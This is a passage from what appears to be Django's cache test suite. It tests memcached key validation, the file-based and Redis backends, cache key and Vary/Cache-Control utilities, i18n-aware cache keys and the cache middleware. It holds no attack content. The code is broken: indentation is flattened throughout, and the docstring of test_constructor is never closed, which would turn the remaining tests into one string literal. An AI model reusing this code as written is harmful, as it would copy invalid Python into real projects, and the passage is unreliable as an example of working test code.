While other backends merely warn, memcached should raise for an invalid
key.
"""
msg = expected_warning.replace(key, cache.make_key(key))
tests = [
('add', [key, 1]),
('get', [key]),
('set', [key, 1]),
('incr', [key]),
('decr', [key]),
('touch', [key]),
('delete', [key]),
('get_many', [[key, 'b']]),
('set_many', [{key: 1, 'b': 2}]),
('delete_many', [[key, 'b']]),
]
for operation, args in tests:
with self.subTest(operation=operation):
with self.assertRaises(InvalidCacheKey) as cm:
getattr(cache, operation)(*args)
self.assertEqual(str(cm.exception), msg)
def test_invalid_with_version_key_length(self):
# make_key() adds a version to the key and exceeds the limit.
key = 'a' * 248
expected_warning = (
'Cache key will cause errors if used with memcached: '
'%r (longer than %s)' % (key, 250)
)
self._perform_invalid_key_test(key, expected_warning)
def test_default_never_expiring_timeout(self):
# Regression test for #22845
with self.settings(CACHES=caches_setting_for_tests(
base=self.base_params,
exclude=memcached_excluded_caches,
TIMEOUT=None)):
cache.set('infinite_foo', 'bar')
self.assertEqual(cache.get('infinite_foo'), 'bar')
def test_default_far_future_timeout(self):
# Regression test for #22845
with self.settings(CACHES=caches_setting_for_tests(
base=self.base_params,
exclude=memcached_excluded_caches,
# 60*60*24*365, 1 year
TIMEOUT=31536000)):
cache.set('future_foo', 'bar')
self.assertEqual(cache.get('future_foo'), 'bar')
def test_memcached_deletes_key_on_failed_set(self):
# By default memcached allows objects up to 1MB. For the cache_db session
# backend to always use the current session, memcached needs to delete
        # the old key if it fails to set the new value.
max_value_length = 2 ** 20
cache.set('small_value', 'a')
self.assertEqual(cache.get('small_value'), 'a')
large_value = 'a' * (max_value_length + 1)
try:
cache.set('small_value', large_value)
except Exception:
# Most clients (e.g. pymemcache or pylibmc) raise when the value is
# too large. This test is primarily checking that the key was
# deleted, so the return/exception behavior for the set() itself is
# not important.
pass
# small_value should be deleted, or set if configured to accept larger values
value = cache.get('small_value')
self.assertTrue(value is None or value == large_value)
def test_close(self):
# For clients that don't manage their connections properly, the
# connection is closed when the request is complete.
signals.request_finished.disconnect(close_old_connections)
try:
with mock.patch.object(cache._class, 'disconnect_all', autospec=True) as mock_disconnect:
signals.request_finished.send(self.__class__)
self.assertIs(mock_disconnect.called, self.should_disconnect_on_close)
finally:
signals.request_finished.connect(close_old_connections)
def test_set_many_returns_failing_keys(self):
def fail_set_multi(mapping, *args, **kwargs):
return mapping.keys()
with mock.patch.object(cache._class, 'set_multi', side_effect=fail_set_multi):
failing_keys = cache.set_many({'key': 'value'})
self.assertEqual(failing_keys, ['key'])
@unittest.skipUnless(PyLibMCCache_params, "PyLibMCCache backend not configured")
@override_settings(CACHES=caches_setting_for_tests(
base=PyLibMCCache_params,
exclude=memcached_excluded_caches,
))
class PyLibMCCacheTests(BaseMemcachedTests, TestCase):
base_params = PyLibMCCache_params
# libmemcached manages its own connections.
should_disconnect_on_close = False
@property
def incr_decr_type_error(self):
return cache._lib.ClientError
@override_settings(CACHES=caches_setting_for_tests(
base=PyLibMCCache_params,
exclude=memcached_excluded_caches,
OPTIONS={
'binary': True,
'behaviors': {'tcp_nodelay': True},
},
))
def test_pylibmc_options(self):
self.assertTrue(cache._cache.binary)
self.assertEqual(cache._cache.behaviors['tcp_nodelay'], int(True))
def test_pylibmc_client_servers(self):
backend = self.base_params['BACKEND']
tests = [
('unix:/run/memcached/socket', '/run/memcached/socket'),
('/run/memcached/socket', '/run/memcached/socket'),
('localhost', 'localhost'),
('localhost:11211', 'localhost:11211'),
('[::1]', '[::1]'),
('[::1]:11211', '[::1]:11211'),
('127.0.0.1', '127.0.0.1'),
('127.0.0.1:11211', '127.0.0.1:11211'),
]
for location, expected in tests:
settings = {'default': {'BACKEND': backend, 'LOCATION': location}}
with self.subTest(location), self.settings(CACHES=settings):
self.assertEqual(cache.client_servers, [expected])
@unittest.skipUnless(PyMemcacheCache_params, 'PyMemcacheCache backend not configured')
@override_settings(CACHES=caches_setting_for_tests(
base=PyMemcacheCache_params,
exclude=memcached_excluded_caches,
))
class PyMemcacheCacheTests(BaseMemcachedTests, TestCase):
base_params = PyMemcacheCache_params
@property
def incr_decr_type_error(self):
return cache._lib.exceptions.MemcacheClientError
def test_pymemcache_highest_pickle_version(self):
self.assertEqual(
cache._cache.default_kwargs['serde']._serialize_func.keywords['pickle_version'],
pickle.HIGHEST_PROTOCOL,
)
for cache_key in settings.CACHES:
for client_key, client in caches[cache_key]._cache.clients.items():
with self.subTest(cache_key=cache_key, server=client_key):
self.assertEqual(
client.serde._serialize_func.keywords['pickle_version'],
pickle.HIGHEST_PROTOCOL,
)
@override_settings(CACHES=caches_setting_for_tests(
base=PyMemcacheCache_params,
exclude=memcached_excluded_caches,
OPTIONS={'no_delay': True},
))
def test_pymemcache_options(self):
self.assertIs(cache._cache.default_kwargs['no_delay'], True)
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.filebased.FileBasedCache',
))
class FileBasedCacheTests(BaseCacheTests, TestCase):
"""
Specific test cases for the file-based cache.
"""
def setUp(self):
super().setUp()
self.dirname = self.mkdtemp()
        # Cache LOCATION cannot be modified through override_settings /
        # modify_settings, hence settings are manipulated directly here and the
        # setting_changed signal is triggered manually.
for cache_params in settings.CACHES.values():
cache_params['LOCATION'] = self.dirname
setting_changed.send(self.__class__, setting='CACHES', enter=False)
def tearDown(self):
super().tearDown()
# Call parent first, as cache.clear() may recreate cache base directory
shutil.rmtree(self.dirname)
def mkdtemp(self):
return tempfile.mkdtemp()
def test_ignores_non_cache_files(self):
fname = os.path.join(self.dirname, 'not-a-cache-file')
with open(fname, 'w'):
os.utime(fname, None)
cache.clear()
self.assertTrue(os.path.exists(fname),
'Expected cache.clear to ignore non cache files')
os.remove(fname)
def test_clear_does_not_remove_cache_dir(self):
cache.clear()
self.assertTrue(os.path.exists(self.dirname),
'Expected cache.clear to keep the cache dir')
def test_creates_cache_dir_if_nonexistent(self):
os.rmdir(self.dirname)
cache.set('foo', 'bar')
self.assertTrue(os.path.exists(self.dirname))
def test_get_ignores_enoent(self):
cache.set('foo', 'bar')
os.unlink(cache._key_to_file('foo'))
# Returns the default instead of erroring.
self.assertEqual(cache.get('foo', 'baz'), 'baz')
@skipIf(
sys.platform == 'win32',
'Windows only partially supports umasks and chmod.',
)
def test_cache_dir_permissions(self):
os.rmdir(self.dirname)
dir_path = Path(self.dirname) / 'nested' / 'filebasedcache'
for cache_params in settings.CACHES.values():
cache_params['LOCATION'] = dir_path
setting_changed.send(self.__class__, setting='CACHES', enter=False)
cache.set('foo', 'bar')
self.assertIs(dir_path.exists(), True)
tests = [
dir_path,
dir_path.parent,
dir_path.parent.parent,
]
for directory in tests:
with self.subTest(directory=directory):
dir_mode = directory.stat().st_mode & 0o777
self.assertEqual(dir_mode, 0o700)
def test_get_does_not_ignore_non_filenotfound_exceptions(self):
with mock.patch('builtins.open', side_effect=OSError):
with self.assertRaises(OSError):
cache.get('foo')
def test_empty_cache_file_considered_expired(self):
cache_file = cache._key_to_file('foo')
with open(cache_file, 'wb') as fh:
fh.write(b'')
with open(cache_file, 'rb') as fh:
self.assertIs(cache._is_expired(fh), True)
@unittest.skipUnless(RedisCache_params, "Redis backend not configured")
@override_settings(CACHES=caches_setting_for_tests(
base=RedisCache_params,
exclude=redis_excluded_caches,
))
class RedisCacheTests(BaseCacheTests, TestCase):
def setUp(self):
import redis
super().setUp()
self.lib = redis
@property
def incr_decr_type_error(self):
return self.lib.ResponseError
def test_cache_client_class(self):
self.assertIs(cache._class, RedisCacheClient)
self.assertIsInstance(cache._cache, RedisCacheClient)
def test_get_backend_timeout_method(self):
positive_timeout = 10
positive_backend_timeout = cache.get_backend_timeout(positive_timeout)
self.assertEqual(positive_backend_timeout, positive_timeout)
negative_timeout = -5
negative_backend_timeout = cache.get_backend_timeout(negative_timeout)
self.assertEqual(negative_backend_timeout, 0)
none_timeout = None
none_backend_timeout = cache.get_backend_timeout(none_timeout)
self.assertIsNone(none_backend_timeout)
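    # Writes always use the first connection pool; reads may be routed to
    # another pool when more than one server is configured.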
def test_get_connection_pool_index(self):
pool_index = cache._cache._get_connection_pool_index(write=True)
self.assertEqual(pool_index, 0)
pool_index = cache._cache._get_connection_pool_index(write=False)
if len(cache._cache._servers) == 1:
self.assertEqual(pool_index, 0)
else:
self.assertGreater(pool_index, 0)
self.assertLess(pool_index, len(cache._cache._servers))
def test_get_connection_pool(self):
pool = cache._cache._get_connection_pool(write=True)
self.assertIsInstance(pool, self.lib.ConnectionPool)
pool = cache._cache._get_connection_pool(write=False)
self.assertIsInstance(pool, self.lib.ConnectionPool)
def test_get_client(self):
self.assertIsInstance(cache._cache.get_client(), self.lib.Redis)
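# Re-run the file-based cache tests with the cache directory given as a
# pathlib.Path instead of a str.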
class FileBasedCachePathLibTests(FileBasedCacheTests):
def mkdtemp(self):
tmp_dir = super().mkdtemp()
return Path(tmp_dir)
@override_settings(CACHES={
'default': {
'BACKEND': 'cache.liberal_backend.CacheClass',
},
})
class CustomCacheKeyValidationTests(SimpleTestCase):
"""
Tests for the ability to mixin a custom ``validate_key`` method to
a custom cache backend that otherwise inherits from a builtin
backend, and override the default key validation. Refs #6447.
"""
def test_custom_key_validation(self):
# this key is both longer than 250 characters, and has spaces
key = 'some key with spaces' * 15
val = 'a value'
cache.set(key, val)
self.assertEqual(cache.get(key), val)
@override_settings(
CACHES={
'default': {
'BACKEND': 'cache.closeable_cache.CacheClass',
}
}
)
class CacheClosingTests(SimpleTestCase):
def test_close(self):
self.assertFalse(cache.closed)
signals.request_finished.send(self.__class__)
self.assertTrue(cache.closed)
def test_close_only_initialized(self):
with self.settings(CACHES={
'cache_1': {
'BACKEND': 'cache.closeable_cache.CacheClass',
},
'cache_2': {
'BACKEND': 'cache.closeable_cache.CacheClass',
},
}):
self.assertEqual(caches.all(initialized_only=True), [])
signals.request_finished.send(self.__class__)
self.assertEqual(caches.all(initialized_only=True), [])
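# Settings for the default-timeout tests below: a locmem cache with the default
# TIMEOUT, and a copy of it with TIMEOUT=None (never expiring).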
DEFAULT_MEMORY_CACHES_SETTINGS = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'unique-snowflake',
}
}
NEVER_EXPIRING_CACHES_SETTINGS = copy.deepcopy(DEFAULT_MEMORY_CACHES_SETTINGS)
NEVER_EXPIRING_CACHES_SETTINGS['default']['TIMEOUT'] = None
class DefaultNonExpiringCacheKeyTests(SimpleTestCase):
"""
    Cache settings with TIMEOUT=None create caches that set non-expiring keys.
"""
def setUp(self):
        # The default key expiration time of 5 minutes (300 seconds) is defined
        # in BaseCache.__init__().
self.DEFAULT_TIMEOUT = caches[DEFAULT_CACHE_ALIAS].default_timeout
def tearDown(self):
        del self.DEFAULT_TIMEOUT
def test_default_expiration_time_for_keys_is_5_minutes(self):
"""The default expiration time of a cache key is 5 minutes.
This value is defined in
django.core.cache.backends.base.BaseCache.__init__().
"""
self.assertEqual(300, self.DEFAULT_TIMEOUT)
def test_caches_with_unset_timeout_has_correct_default_timeout(self):
"""Caches that have the TIMEOUT parameter undefined in the default
settings will use the default 5 minute timeout.
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertEqual(self.DEFAULT_TIMEOUT, cache.default_timeout)
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_has_correct_default_timeout(self):
"""Memory caches that have the TIMEOUT parameter set to `None` in the
        default settings will have `None` as the default timeout.
This means "no timeout".
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertIsNone(cache.default_timeout)
self.assertIsNone(cache.get_backend_timeout())
@override_settings(CACHES=DEFAULT_MEMORY_CACHES_SETTINGS)
def test_caches_with_unset_timeout_set_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter unset will set cache
        keys with the default 5 minute timeout.
"""
key = "my-key"
value = "my-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNotNone(cache._expire_info[cache_key])
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_set_non_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter set to `None` will set
        a non-expiring key by default.
"""
key = "another-key"
value = "another-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNone(cache._expire_info[cache_key])
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
ALLOWED_HOSTS=['.example.com'],
)
class CacheUtils(SimpleTestCase):
"""TestCase for django.utils.cache functions."""
host = 'www.example.com'
path = '/cache/test/'
factory = RequestFactory(HTTP_HOST=host)
def tearDown(self):
cache.clear()
def _get_request_cache(self, method='GET', query_string=None, update_cache=None):
request = self._get_request(self.host, self.path,
method, query_string=query_string)
request._cache_update_cache = update_cache if update_cache else True
return request
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('*', ('Accept-Language', 'Cookie'), '*'),
('Accept-Language, Cookie', ('*',), '*'),
)
for initial_vary, newheaders, resulting_vary in headers:
with self.subTest(initial_vary=initial_vary, newheaders=newheaders):
response = HttpResponse()
if initial_vary is not None:
response.headers['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response.headers['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
# A specified key_prefix is taken into account.
key_prefix = 'localprefix'
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# The querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'beaf87a9a99ee81c673ea2d67ccbec2a.d41d8cd98f00b204e9800998ecf8427e'
)
def test_cache_key_varies_by_url(self):
"""
get_cache_key keys differ by fully-qualified URL instead of path
"""
request1 = self.factory.get(self.path, HTTP_HOST='sub-1.example.com')
learn_cache_key(request1, HttpResponse())
request2 = self.factory.get(self.path, HTTP_HOST='sub-2.example.com')
learn_cache_key(request2, HttpResponse())
self.assertNotEqual(get_cache_key(request1), get_cache_key(request2))
def test_learn_cache_key(self):
request = self.factory.head(self.path)
response = HttpResponse()
response.headers['Vary'] = 'Pony'
# Make sure that the Vary header is added to the key hash
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_patch_cache_control(self):
tests = (
# Initial Cache-Control, kwargs to patch_cache_control, expected Cache-Control parts
(None, {'private': True}, {'private'}),
('', {'private': True}, {'private'}),
# no-cache.
('', {'no_cache': 'Set-Cookie'}, {'no-cache=Set-Cookie'}),
('', {'no-cache': 'Set-Cookie'}, {'no-cache=Set-Cookie'}),
('no-cache=Set-Cookie', {'no_cache': True}, {'no-cache'}),
('no-cache=Set-Cookie,no-cache=Link', {'no_cache': True}, {'no-cache'}),
('no-cache=Set-Cookie', {'no_cache': 'Link'}, {'no-cache=Set-Cookie', 'no-cache=Link'}),
(
'no-cache=Set-Cookie,no-cache=Link',
{'no_cache': 'Custom'},
{'no-cache=Set-Cookie', 'no-cache=Link', 'no-cache=Custom'},
),
# Test whether private/public attributes are mutually exclusive
('private', {'private': True}, {'private'}),
('private', {'public': True}, {'public'}),
('public', {'public': True}, {'public'}),
('public', {'private': True}, {'private'}),
('must-revalidate,max-age=60,private', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
('must-revalidate,max-age=60,public', {'private': True}, {'must-revalidate', 'max-age=60', 'private'}),
('must-revalidate,max-age=60', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
)
cc_delim_re = re.compile(r'\s*,\s*')
for initial_cc, newheaders, expected_cc in tests:
with self.subTest(initial_cc=initial_cc, newheaders=newheaders):
response = HttpResponse()
if initial_cc is not None:
response.headers['Cache-Control'] = initial_cc
patch_cache_control(response, **newheaders)
parts = set(cc_delim_re.split(response.headers['Cache-Control']))
self.assertEqual(parts, expected_cc)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix',
},
},
)
class PrefixedCacheUtils(CacheUtils):
pass
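# HEAD requests should be served from entries cached by an earlier HEAD or GET
# request for the same URL.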
@override_settings(
CACHE_MIDDLEWARE_SECONDS=60,
CACHE_MIDDLEWARE_KEY_PREFIX='test',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
)
class CacheHEADTest(SimpleTestCase):
path = '/cache/test/'
factory = RequestFactory()
def tearDown(self):
cache.clear()
def _set_cache(self, request, msg):
return UpdateCacheMiddleware(lambda req: HttpResponse(msg))(request)
def test_head_caches_correctly(self):
test_content = 'test content'
request = self.factory.head(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
def test_head_with_cached_get(self):
test_content = 'test content'
request = self.factory.get(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
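# Cache keys must incorporate the active language (and time zone) when i18n or
# time zone support is enabled, so responses in different languages don't collide.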
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
LANGUAGES=[
('en', 'English'),
('es', 'Spanish'),
],
)
class CacheI18nTest(SimpleTestCase):
path = '/cache/test/'
factory = RequestFactory()
def tearDown(self):
cache.clear()
@override_settings(USE_I18N=True, USE_TZ=False)
def test_cache_key_i18n_translation(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
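    # With translation active, the learned cache key should not depend on the
    # Accept-Language value or on the ordering of the Vary header entries.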
def check_accept_language_vary(self, accept_language, vary, reference_key):
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_LANGUAGE'] = accept_language
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response.headers['Vary'] = vary
key = learn_cache_key(request, response)
key2 = get_cache_key(request)
self.assertEqual(key, reference_key)
self.assertEqual(key2, reference_key)
@override_settings(USE_I18N=True, USE_TZ=False)
def test_cache_key_i18n_translation_accept_language(self):
lang = translation.get_language()
self.assertEqual(lang, 'en')
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response.headers['Vary'] = 'accept-encoding'
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
self.check_accept_language_vary(
'en-us',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'en-US',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8',
'accept-encoding, accept-language, cookie',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8,ko;q=0.6',
'accept-language, cookie, accept-encoding',
key
)
self.check_accept_language_vary(
'ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3 ',
'accept-encoding, cookie, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4',
'accept-language, accept-encoding, cookie',
key
)
self.check_accept_language_vary(
'ko;q=1.0,en;q=0.5',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'ko, en',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR, en-US',
'accept-encoding, accept-language, cookie',
key
)
@override_settings(USE_I18N=False, USE_TZ=True)
def test_cache_key_i18n_timezone(self):
request = self.factory.get(self.path)
tz = timezone.get_current_timezone_name()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(tz, key, "Cache keys should include the time zone name when time zones are active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False)
def test_cache_key_no_i18n(self):
request = self.factory.get(self.path)
lang = translation.get_language()
tz = timezone.get_current_timezone_name()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertNotIn(lang, key, "Cache keys shouldn't include the language name when i18n isn't active")
self.assertNotIn(tz, key, "Cache keys shouldn't include the time zone name when i18n isn't active")
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_I18N=True,
)
def test_middleware(self):
def set_cache(request, lang, msg):
def get_response(req):
return HttpResponse(msg)
translation.activate(lang)
return UpdateCacheMiddleware(get_response)(request)
        # cache with non-empty request.GET
request = self.factory.get(self.path, {'foo': 'bar', 'other': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
# first access, cache must return None
self.assertIsNone(get_cache_data)
content = 'Check for cache with QUERY_STRING'
def get_response(req):
return HttpResponse(content)
UpdateCacheMiddleware(get_response)(request)
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
# cache must return content
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
# different QUERY_STRING, cache must be empty
request = self.factory.get(self.path, {'foo': 'bar', 'somethingelse': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertIsNone(get_cache_data)
# i18n tests
en_message = "Hello world!"
es_message = "Hola mundo!"
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
# The cache can be recovered
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, en_message.encode())
# change the session language and set content
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'es', es_message)
        # change the language again
translation.activate('en')
# retrieve the content from cache
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertEqual(get_cache_data.content, en_message.encode())
        # change the language again
translation.activate('es')
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertEqual(get_cache_data.content, es_message.encode())
# reset the language
translation.deactivate()
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
)
def test_middleware_doesnt_cache_streaming_response(self):
request = self.factory.get(self.path)
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertIsNone(get_cache_data)
def get_stream_response(req):
return StreamingHttpResponse(['Check for cache with streaming content.'])
UpdateCacheMiddleware(get_stream_response)(request)
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertIsNone(get_cache_data)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix'
},
},
)
class PrefixedCacheI18nTest(CacheI18nTest):
pass
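# Plain views used by the CacheMiddleware and cache_page decorator tests below.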
def hello_world_view(request, value):
return HttpResponse('Hello World %s' % value)
def csrf_view(request):
return HttpResponse(csrf(request)['csrf_token'])
@override_settings(
CACHE_MIDDLEWARE_ALIAS='other',
CACHE_MIDDLEWARE_KEY_PREFIX='middlewareprefix',
CACHE_MIDDLEWARE_SECONDS=30,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other',
'TIMEOUT': '1',
},
},
)
class CacheMiddlewareTest(SimpleTestCase):
factory = RequestFactory()
def setUp(self):
self.default_cache = caches['default']
self.other_cache = caches['other']
def tearDown(self):
self.default_cache.clear()
self.other_cache.clear()
super().tearDown()
def test_constructor(self):
"""
        The constructor correctly distinguishes between CacheMiddleware used as
        middleware and CacheMiddleware used as a view decorator, and sets its
        attributes appropriately.
# If only one argument is passed in construction, it's being used as
# middleware.
middleware = CacheMiddleware(empty_response)
# Now test object attributes against values defined in setUp above
self.assertEqual(middleware.cache_timeout, 30)
self.assertEqual(middleware.key_prefix, 'middlewareprefix')
self.assertEqual(middleware.cache_alias, 'other')
self.assertEqual(middleware.cache, self.other_cache)
# If more arguments are being passed in construction, it's being used
# as a decorator. First, test with "defaults":
as_view_decorator = CacheMiddleware(empty_response, cache_alias=None, key_prefix=None)
self.assertEqual(as_view_decorator.cache_timeout, 30) # Timeout value for 'default' cache, i.e. 30
self.assertEqual(as_view_decorator.key_prefix, '')
# Value of DEFAULT_CACHE_ALIAS from django.core.cache
self.assertEqual(as_view_decorator.cache_alias, 'default')
self.assertEqual(as_view_decorator.cache, self.default_cache)
# Next, test with custom values:
as_view_decorator_with_custom = CacheMiddleware(
hello_world_view, cache_timeout=60, cache_alias='other', key_prefix='foo'
)
self.assertEqual(as_view_decorator_with_custom.cache_timeout, 60)
self.assertEqual(as_view_decorator_with_custom.key_prefix, 'foo')
self.assertEqual(as_view_decorator_with_custom.cache_alias, 'other')
self.assertEqual(as_view_decorator_with_custom.cache, self.other_cache)
def test_update_cache_middleware_constructor(self):
middleware = UpdateCacheMiddleware(empty_response)
self.assertEqual(middleware.cache_timeout, 30)
self.assertIsNone(middleware.page_timeout)
self.assertEqual(middleware.key_prefix, 'middlewareprefix')
self.assertEqual(middleware.cache_alias, 'other')
self.assertEqual(middleware.cache, self.other_cache)
def test_fetch_cache_middleware_constructor(self):
middleware = FetchFromCacheMiddleware(empty_response)
self.assertEqual(middleware.key_prefix, 'middlewareprefix')
self.assertEqual(middleware.cache_alias, 'other')
self.assertEqual(middleware.cache, self.other_cache)
def test_middleware(self):
middleware = CacheMiddleware(hello_world_view)
prefix_middleware = CacheMiddleware(hello_world_view, key_prefix='prefix1')
timeout_middleware = CacheMiddleware(hello_world_view, cache_timeout=1)
request = self.factory.get('/view/')
# Put the request through the request middleware
result = middleware.process_request(request)
self.assertIsNone(result)
response = hello_world_view(request, '1')
# Now put the response through the response middleware
response = middleware.process_response(request, response)
# Repeating the request should result in a cache hit
result = middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
# The same request through a different middleware won't hit
result = prefix_middleware.process_request(request)
self.assertIsNone(result)
# The same request with a timeout _will_ hit
result = timeout_middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
def test_view_decorator(self):
# decorate the same view with different cache decorators
default_view = cache_page(3)(hello_world_view)
default_with_prefix_view = cache_page(3, key_prefix='prefix1')(hello_world_view)
explicit_default_view = cache_page(3, cache='default')(hello_world_view)
explicit_default_with_prefix_view = cache_page(3, cache='default', key_prefix='prefix1')(hello_world_view)
other_view = cache_page(1, cache='other')(hello_world_view)
other_with_prefix_view = cache_page(1, cache='other', key_prefix='prefix2')(hello_world_view)
request = self.factory.get('/view/')
# Request the view once
response = default_view(request, '1')
self.assertEqual(response.content, b'Hello World 1')
# Request again -- hit the cache
response = default_view(request, '2')
self.assertEqual(response.content, b'Hello World 1')
# Requesting the same view with the explicit cache should yield the same result
response = explicit_default_view(request, '3')
self.assertEqual(response.content, b'Hello World 1')
# Requesting with a prefix will hit a different cache key
response = explicit_default_with_prefix_view(request, '4')
self.assertEqual(response.content, b'Hello World 4')
# Hitting the same view again gives a cache hit
response = explicit_default_with_prefix_view(request, '5')
self.assertEqual(response.content, b'Hello World 4')
# And going back to the implicit cache will hit the same cache
response = default_with_prefix_view(request, '6')
self.assertEqual(response.content, b'Hello World 4')
# Requesting from an alternate cache won't hit cache
response = other_view(request, '7')
self.assertEqual(response.content, b'Hello World 7')
# But a repeated hit will hit cache
response = other_view(request, '8')
self.assertEqual(response.content, b'Hello World 7')
# And prefixing the alternate cache yields yet another cache entry
response = other_with_prefix_view(request, '9')
self.assertEqual(response.content, b'Hello World 9')
# But if we wait a couple of seconds...
time.sleep(2)
# ... the default cache will still hit
